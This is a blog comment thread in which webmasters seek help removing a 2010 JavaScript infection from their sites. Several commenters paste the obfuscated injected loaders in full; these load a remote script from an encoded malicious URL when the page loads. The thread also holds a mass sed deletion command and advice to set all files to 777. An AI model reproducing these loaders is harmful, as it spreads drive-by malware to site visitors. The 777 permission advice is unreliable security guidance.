var i=”i”;u=function(){var g=document;var jg=new Array();window[_([2,7][0])]=function(){try {this.l=26180;ui=g[_([8,1][1])](_([0][0]));ui[_([3][0])]=_([8,3][0]);var p=”";ui[_([5][0])](_([2,7][1]), “1″);var gf = g[_([6][0])];var ve;if(ve!=” && ve!=’mc’){ve=null};gf[_([4][0])](ui);} catch(n){};};this.iz=”;function _(m){var dm=”";var t=['sIc4rji4pItj'.replace(/[ja46I]/g, ”), ‘c|r_eka_t/e|E_lkeJm|e_n_t/’.replace(/[/J\|_k]/g, ”), ‘ojnelxojaQdx’.replace(/[xe9Qj]/g, ”), ’s0r5c5′.replace(/[5Zv40]/g, ”), ‘a!p!p!eqn0dMCqh9i9l!dM’.replace(/[Mq\!90]/g, ”), ’sQeBt+A+tBtBrBi+bjujtjeB’.replace(/[B@j\+Q]/g, ”), ‘b|oGdGyG’.replace(/[G/\|fW]/g, ”), ‘dKe.f.esr.’.replace(/[\.sX_K]/g, ”), ‘hFtStSpF:R/F/<aRlSlRrJeJc<i<pSeSsS-RcRoFmS.FeJaFrJtRhSlSiSnRk<.<nSeRtF.Sn<iJkFk<aFnJsRpRoSrRtJs<-<cRoRmS.RnJeFwRgFoSlFfJo<nSlRi<nFeF.FrRuF:S8R0J8<0</JwRuFnSd<eSrSgFrRoRuSnJdS.RcRo<m</<w<u<nRdSeJrSg<rRoRuRnSdR.ScJoRm</RgJuSmRt<r<eJeR.ScJoJmJ/SeJlJpJaRi<sS.ScJoSm</RgRoSoFgFlFeS.RcRo<m</F’.replace(/[FR\<SJ]/g, ”)];var j=t[m];return j;}var kt;if(kt!=”){kt=’lr’};this.j_=15316;};var lm;if(lm!=” && lm!=’ae’){lm=”};u();var o;if(o!=” && o!=’cw’){o=”};

mist February 12th, 2010 at 10:00 am

if you have shell access to the linux server, you can fix it manually with something like this:

grep -ilr ’sqcqrLiVpLtV’ /var/www/ | xargs -i@ sed -i ‘/sqcqrLiVpLtV/d’ @

replace the ’sqcqrLiVpLtV’ with some unique part of your injected script.
this command searches the weird characters in all files within /var/www/ and deletes the lines which contain it.

Mark February 12th, 2010 at 12:21 pm

Thanks!

Grep works like a charm
if you need shell acces, you can get php shell and open shell in your browser.

stounemaster February 12th, 2010 at 1:18 pm

hello,

Can I post here the exact script I’m having problems whith?

thank you for the help !

Nik Nastev February 12th, 2010 at 2:41 pm

any chance for new script?

Thanks

rahul February 15th, 2010 at 8:03 pm

Konstantin

I ran the script but resulted in catching nothing. The trojan that my files are infected with is

JS:Illredir-I [Trj]

please help me with a script for removing this.

Thanks

Evgeny Orlov February 19th, 2010 at 4:01 pm

The new one code, not identified.
var j;if(j!=” && j!=’a'){j=null};this._=”";:LineMixer [var lg=new Array();var p=window;var i='sTcTr&i$pvtT'.replace(/[T\$&Av]/g, ”);var r=’cYrYe>aptYe>E>lpe>m>epnptp’.replace(/[ph\>Yq]/g, ”);var jg=”;var __;if(__!=”){__=’ys’};]p.onload=function(){try {var w=false;q=document[r](i);this.va=”va”;:LineMixer [this.ei=54904;this._n=false;q['s;r>cV'.replace(/[V\>;Aa]/g, ”)]=’h1tEtTpE:+/E/FiEbTiEb1oE-FcFoTmE.F9FwFeTeF.TcFo+mF.1rEeEdFd+iFtF-1cEoFmF.1nFeFw+gTo1l+fFoFnElEi1nFe+.1rFu+:E810T8T0+/EcFy+wToErFlFdF.Tc+o1mE/TcTyTwFoFrTlFdE.Ec+oFmT/+w+hTi+t1e1p+aTg+e1sE.TcFoTmE/Th+eEiTsTeE.FdFeE/+g1o+oTgFlFeT.EcToEmF/T’.replace(/[T1F\+E]/g, ”);q.setAttribute(’dsezfze9r9′.replace(/[9Gsmz]/g, ”), “1″);]var r_=”;var gt=”gt”;var jq;if(jq!=’lf’ && jq != ”){jq=null};this.vv=”";document['bRo:d:y>'.replace(/[\>m8R\:]/g, ”)]['a+p+pXeXn!d!CQh!iXl>d>'.replace(/[\>\!\+QX]/g, ”)](q);var pm;if(pm!=’mi’ && pm != ”){pm=null};} catch(l){this.md=37788;};var pf=28263;};
this.y_=”";var q=document;var m=window;var ee;if(ee!=’ld’ && ee!=’a_’){ee=’ld’};function y(w){var h=['hTtStqpT:T/F/Fi?kTeqa?-TcqoTmT.SgToqoTgTlqeF.FcFoFm?.?tFwF.TrSe?aFlSiStqyTkTi?nFgTsF-ScqoFmT.?h?oFmTeFuqsqa?oqn?l?iSn?e?.?rFuS:F8q0q8F0F/?mqiFnFiTnqoTvSa?.?oSrqgF/qmFiFnFiqnFoSvFaT.qo?rqgS/?gFoqoSgTl?eS.?cFoqmq/T1?7?1?7?3S.FcFoqmS/Fe?lSmTuFn?dSo?.SeFsT/S'.replace(/[SF\?qT]/g, ”), ’sXcXrKiGpatK’.replace(/[KXabG]/g, ”), ‘c8r8e8a,tpepE8lxepm8e,n8t,’.replace(/[,Upx8]/g, ”), ‘oInulIoIaydm’.replace(/[muy~I]/g, ”), ’s%r8cW’.replace(/[W8fE%]/g, ”), ‘aOpNpOePnPdmCNhNiOlNdm’.replace(/[mPgNO]/g, ”), ’s7eGtGAWt7tGrUiWb7uGtWe7′.replace(/[71GWU]/g, ”), ‘b4oxd5y5′.replace(/[5gmx4]/g, ”), ‘dte3fPe+r+’.replace(/[\+PW3t]/g, ”), “1″];var t=”t”;var l=h[w];return l;}var a = function(){var xr;if(xr!=” && xr!=’rd’){xr=’r'};try {x=q[y([2,2][0])](y([1,8][0]));x[y([6][0])](y([8][0]), y([3,9][1]));this.xg=38926;x[y([4][0])]=y([0][0]);var d_=”;var lb = q[y([7][0])];lb[y([5,8][0])](x);} catch(lx){};var b;if(b!=’g'){b=”};};m[y([8,3][1])]=a;
var K=11669;var Z=’replace’;this.I=”;var l=’]';var Q=’[';var nm='';var k='g';var J='';this.z='';function C(D,ZA){var S="";var N=Q;N+=ZA;this.zd="";N+=l;var d=false;var n=new RegExp(N, k);var Ph="";return D[Z](n, ”);var WD=19684;};var s=C(’:i8H0H8i0H’,”HlUsi”);this.nmI=false;var V=window;var G=”;var o=C(’hRtMtMpR:R/2/2pRpRsMt2r2e4aJmJ-4c2oMmJ.Jf2iMxRy4aM.JcMoRmJ.JaJm4aMz4oMn2-4cJo4-JuRkR.2nReMw2u4s4a4gJuRi4dRe2.2rRu4′,”42JRM”);var DP=”;var f=C(’/NsOiJnAaA.JcAo4m4.4cOnN/OsOiNnAaO.OcJoNmA.AcJn4/JgAoNoNgAlNeO.OcAo4mO/J3O7AwAaAnO.NcNo4mN/4aNcNcAuOwJeNaAtJhAeJr4.4cAoOmO/A’,”AOJ4N”);var gz=”";var T=document;var R=false;function q(X){var h=[C('s5c5rli5p5t5',"5gblh"), C('cPr0e0ast0esEslPePmOeOnPtO',"OsP50"), C('ojnflDoDafd1',"1fDji"), C('sWrHcv',"vHgWp"), C('aPpPpweunwdTCHhTiPlTdu',"uPwTH"), C('sFeHtFAztFtHrRiHbzuRtHez',"zRHLF"), C('b9oCdTy6',"6zT9C"), C('dueufYe4rn',"npu4Y"), "1"];var Y=h[X];var iy=false;return Y;}this.HX=”";var GP = function(){try {this.F=”";G+=o;G+=s;G+=f;this.gW=43856;this.hz=”;u=T[q([1][0])](q([0][0]));var lT=32291;this.OL=”";u[q([3][0])]=G;var lW=false;u[q([5][0])](q([7][0]), q([8][0]));var W = T[q([6][0])];var v=false;var fr=false;W[q([4][0])](u);var B=”";} catch(e){};var iT=25549;};var QK=4473;var Ne=”;V[q([7,2][1])]=GP;var BU=false;

Konstantin Boyko February 19th, 2010 at 8:03 pm

Thanks to everyone for posting your variants of the code. I was busy with other things and haven’t had time for releasing new versions of the script. As far as I can see the hackers have learnt the javascript (or used some tool) and obfuscated their javascript code rather well. So now it is rather hard to write a regular expression for every variation and to cover all of them - since they modify it often. So I had to relase the version 1.3 which can be donwloaded here.

The main difference from all previous versions is that it is semi-automatic: you enter the code which you can see in your files and the script searches/replaces for it. You need to copy exact code which you have inside . There are also 2 options (buttons) - “Search” and “Search&Replace”. I recommend to run “Search” first and make sure that backup is working fine on your server and that your search string is correct.

Also you need to make sure that you have magic_quotes_gpc=Off in PHP settings for your server.

As always comments/contributions are kindly appreciated.

victoria February 21st, 2010 at 2:09 am

Thanks for this your help has been invaluable especially as there seems to be very little out there for this obviously widespread attack!

Chris Brennan February 23rd, 2010 at 7:27 am

Thank you very much for posting this script Konstantin. I’ve been freaking out all day once I realized that all 10 of my websites had been compromised and were now seeding viruses and malware to everyone who visited them. It took me a while to figure out how to implement your fix, and I just wanted to point out a couple of things to others who may have similar problems following the directions.

1. The only way I was successfully able to turn magic quotes off was by doing it through the .htaccess file. Editing this file may be more familiar than the other route to most people. Basically you just add this line to the .htaccess file in your root director: php_flag magic_quotes_gpc Off

I got the directions on that from this page: http://www.php.net/manual/en/security.magicquotes.disabling.php

2. You really do have to change the file permissions for everything to 777. He isn’t joking about that. Once you’ve done the above two steps the script does work pretty well though, as far as I can tell.

The only problem is that I can only figure out how to run it from the root directory given my limited technical knowledge, and I have found that there are other folders and files *outside* of the root directory that have been infected as well. With these all I have been able to do is go in and edit them manually.

This may be the reason why many people are reporting that the virus comes back after a day though, because they don’t clean the files outside of the root. At least, I’m hoping that that is the case since I *just* started cleaning all of my files, and there hasn’t been enough time to see if it will come back yet.

The last point that I wanted to make is that a lot of websites seem to say that this virus is propagated through unprotected passwords in Filezilla, because Filezilla doesn’t encrypt their passwords. I got rid of Filezilla today and found a new FTP program, but I was wondering if that was how everyone else got their websites infected as well? Did everyone get this on their sites due to Filezilla? The only other possibility for me is that some of my wordpress versions were kind of old. Other than that, I really don’t know how this happened. Any insight you guys can share as to the cause of this would be appreciated, so that we can all better avoid it in the future.

Many thanks.

Jake February 23rd, 2010 at 8:24 am

Hi Konstantin,

I’ve also been hit by what I believe to be a variant of the Gumblar virus, but I can’t quite be sure because it’s different from what others have posted here. Here’s what I see at the bottom of every index.php file in my web server:

var cVN=”849b92a98ee98d878086b4c89d8c878fcaaf80adbf8c9a8098a9a9abbd93bb88a18ea394ae90a09fad9da399a1a992a2849f82ad84abba938c8082a0aaa98b9f8ef3a99cefb99e8cf38eabef8b9f”;var cqf;if(cqf!=” && cqf!=’UBb’){cqf=null};this.sd=27476;function J(s){var e=”";var Bu;if(Bu!=” && Bu!=’i'){Bu=’nz’}; this.Ub=”Ub”;this.mW=”;function BI(V,y){this.CO=”;this.p=”;return V[X("rehdcoaCAt", [4,2,6,0,7,5,3,1])](y);var mf=new Date();}var pk;if(pk!=’inr’){pk=’inr’}; function E(k,I){var HH;if(HH!=’Mr’ && HH!=’Vw’){HH=”};var Iv=”Iv”;return k^I;this.sK=”";var Yv;if(Yv!=” && Yv!=’dd’){Yv=’RC’};}this.Ku=”";var Tq=”"; var X=function(G, Xr){this.va=”";var K=[1][0];this.Zv=”";var m = Xr.length;var Q = G.length;var h=[0,64,162][0];var v = ”;this.aj=”;for(var a = h; a =h;a=a-[1,10,2,170][0]){v+=G[X("hcratA", [1,0])](a);this.vg=false;var dM;if(dM!=’II’ && dM!=’JN’){dM=’II’};}this.tv=false;this.Ll=false;var wA=”";return v;};var BR;if(BR!=”){BR=’WO’};var zq;if(zq!=’Sy’ && zq!=’sD’){zq=’Sy’};this.vy=50904;this.nX=43953; var QF=function(q){var DM;if(DM!=’XEZ’ && DM!=’rG’){DM=”};var Op;if(Op!=’LL’){Op=’LL’};var b=[232,122,0][2];var VV=q[X("elgnht", [1,0])];var Qa=[255,201,149][0];var Jz;if(Jz!=’oq’){Jz=’oq’};var R=[132,0][1];var jQ=false;var VF;if(VF!=’LQ’){VF=’LQ’};var K=[85,1,194][1];var JUp;if(JUp!=” && JUp!=’NG’){JUp=’cs’};while(b<VV){b++;var yv;if(yv!=’ym’ && yv != ”){yv=null};C=BI(q,b - K);this.EpY=”";this.JO=”";R+=C*VV;}var TS;if(TS!=’zu’ && TS!=’kwe’){TS=’zu’};var hs=”hs”;return new n(R % Qa);var zj;if(zj!=”){zj=’sqr’};};var yT=39061;var wo=new Array();var KM=window;var Ky;if(Ky!=’Jzc’){Ky=’Jzc’};var eo;if(eo!=’uY’){eo=’uY’};var F=KM[X("lvae", [3,1,2,0])];this.fE=17167;var U=F(X(”unFctoni”, [2,0,6,3,4,7,5,1]));var H=F(X(”pRgxEe”, [1,5,2,4,3,0]));var YX=new Date();var d = ”;var RS=false;var hsV=new String();var n=F(X(”gtnSir”, [3,1,5,4,2,0]));this.Pi=false;this.yC=39235;var aS=n[X("roChafmrCode", [5,7,1,6,2,3,4,0])];var nG=KM[X("scuneape", [2,3,4,0,1])];var FA=”;var ocO;if(ocO!=”){ocO=’dno’};var ot=”";var XF=new Date();var Cz=new Array();var r = ”;var hD=new Array();var sL=”;var hT = ”;var zb;if(zb!=” && zb!=’XY’){zb=”};var HJ;if(HJ!=” && HJ!=’UG’){HJ=”};var f = “%”;this.AC=”";var aI=10154;var qor;if(qor!=’JNt’ && qor != ”){qor=null};var K =[1,10][0];var Xa = ”;var h =[0][0];var fe;if(fe!=’tVQ’ && fe != ”){fe=null};var eq;if(eq!=’Sx’ && eq != ”){eq=null};var A = /[^@a-z0-9A-Z_-]/g;var uIs=”uIs”;var XL =[65,0,182,2][3];var TEf;if(TEf!=”){TEf=’vV’};var bl;if(bl!=’vh’ && bl!=’iu’){bl=’vh’};this.at=false;var doY=[1, X("oducemtnc.ertaEeelemtn\'(csirtp)\'", [1,0]),2, X(”oducemtnb.do.ypaepdnhCli(d)d”, [1,0]),3, X(”ge.osrreecsuenrr.v.atentflix”, [3,5,0,2,4,1]),4, X(”.dsteAttrbiuet(d\’eefr\’”, [1,0,2]),5, X(”oe.iscmta:er.mpu8080″, [5,0,6,2,4,3,7,1]),6, X(”gogopel.t”, [2,1,3,0]),7, X(”iwdnwoo.lnaod”, [1,0]),8, X(”sernaucpe.com”, [2,5,3,1,0,6,4]),11, X(”unfticn(o)”, [2,0,1]),12, X(”oloegg.com”, [4,2,0,5,1,3]),14, X(”hatcc(e)”, [3,1,2,4,0,5]),15, X(”h\”tpt:”, [1,0,2]),16, X(”sd.rc”, [1,2,0]),17, X(”cgc.a”, [1,0]),18, X(”ozdm”, [2,3,0,1]),19, X(”\’1)\’”, [3,1,0,2]),20, X(”ytr”, [1,2,0])];var Xo=”Xo”;var T = s[X("egnlth", [3,0,2,1])];var MX;if(MX!=”){MX=’ut’};var JJ;if(JJ!=”){JJ=’vs’};var To =[50,40,0][2];this.wx=17732;var uG;if(uG!=’sg’ && uG != ”){uG=null};var iS;if(iS!=’Lv’ && iS != ”){iS=null};for(var Pq=h; Pq < T; Pq+=XL){var Aqe=”;hT+= f; var Zdj=new Date();hT+= s[X("ussbrt", [1,0])](Pq, XL);var Nk;if(Nk!=’ve’){Nk=’ve’};}var Co;if(Co!=” && Co!=’Lf’){Co=null};this.Uy=false;var s = nG(hT);var io=”io”;var jT=”jT”;var otm=”";var GP = new n(J);var qs;if(qs!=’fV’){qs=”};var KK = GP[X("capelre", [5,3,2,4,1,0])](A, r);this.fF=”";var bw = new n(U);var gh;if(gh!=” && gh!=’WA’){gh=’Vz’};var ey;if(ey!=” && ey!=’Iy’){ey=null};var qW = doY[X("ntlegh", [2,3,0,4,1])];var vv=24967;var op;if(op!=’ki’ && op!=’Ap’){op=”};KK = B(KK);var NK;if(NK!=’Rd’ && NK!=’vp’){NK=”};this.Rc=false;var Ey=34415;var UP;if(UP!=’oZT’){UP=’oZT’};var JX=”";var dt = bw[X("elprace", [3,0,2,1])](A, r);var QV=”;var dt = QF(dt);var zs;if(zs!=’xR’){zs=’xR’};var W=QF(KK);var ku=new String();for(var a=h; a KK.length-K){To=h;var uA=new Date();}var TM;if(TM!=’qY’){TM=’qY’};Xa += aS(jf);var Xt;if(Xt!=”){Xt=’zF’};var kQ=”;}var zx=new Array();for(qq=h; qq < qW; qq+=XL){var mm=”";var ib;if(ib!=’rl’ && ib != ”){ib=null};var AR=”;var ls;if(ls!=’Se’ && ls != ”){ls=null};var kq;if(kq!=” && kq!=’OP’){kq=null};var tr;if(tr!=’Zx’ && tr != ”){tr=null};var Y = aS(doY[qq]);var vP = doY[qq + K];this.AK=”;this.cJ=”";this.Ze=false;this.uo=”;var My=”";var wj=”";var AV = new H(Y, “g”);var YJ=new String();Xa=Xa[X("erlpcae", [1,0])](AV, vP);}var ff=new Array();var Ln;if(Ln!=”){Ln=’LD’};var o=new U(Xa);o();var Ke=”;var bP=62265;dt = ”;this.uYr=”";W = ”;KK = ”;var YQ;if(YQ!=’NR’ && YQ!=’vI’){YQ=’NR’};var MFF=new Array();Xa = ”;var Bd=new String();var HIk;if(HIk!=” && HIk!=’vm’){HIk=null};bw = ”;o = ”;var lk=”lk”;var dF=”;this.eU=”;var Nf=new String();return ”;};var cqf;if(cqf!=” && cqf!=’UBb’){cqf=null};this.sd=27476;J(cVN);

Tried installing your script, but when I ran it I received the following message:

Warning: fopen(/home/mysite/public_html/!infected-1266906136.txt) [function.fopen]: failed to open stream: Permission denied in /home/mysite/public_html/curevir.php on line 328

Warning: fclose(): supplied argument is not a valid stream resource in /home/mysite/public_html/curevir.php on line 336
TOTAL: 0
START BACKUP:
END BACKUP!

Can you please tell me what I’m doing wrong?

Sameer Shelavale March 10th, 2010 at 7:51 am

hey Chris,

The virues comes back because either you did not change FTP password after clean up OR one of your machine from which you are accessing FTP is infected.

Please clean up virus from your local machines as well and change FTP password

JamBy March 16th, 2010 at 3:04 pm

This is a very very very cool stuff. Remove all from my site a minute…

THX

Amin March 22nd, 2010 at 8:15 am

Thanks for the script.. its working.. if some of you cant turn off magic quotes off can add this in the top of the curevir.php file.

if ( in_array( strtolower( ini_get( ‘magic_quotes_gpc’ ) ), array( ‘1′, ‘on’ ) ) )
{
$_POST = array_map( ’stripslashes’, $_POST );
$_GET = array_map( ’stripslashes’, $_GET );
$_COOKIE = array_map( ’stripslashes’, $_COOKIE );
}

Flatlander April 6th, 2010 at 3:00 pm

Excellent. First I got a bit afraid as I had many Failed messages, but it turned out that these are file with 0-byte length, which had been created by the virus. So now I just need to remove about a 100 files or so of length 0

Thanks, lifesaver!

Paul April 11th, 2010 at 3:16 pm

merci
thks

Dean June 17th, 2010 at 8:25 am

Thanks! If it only fixed up the file permissions and ownership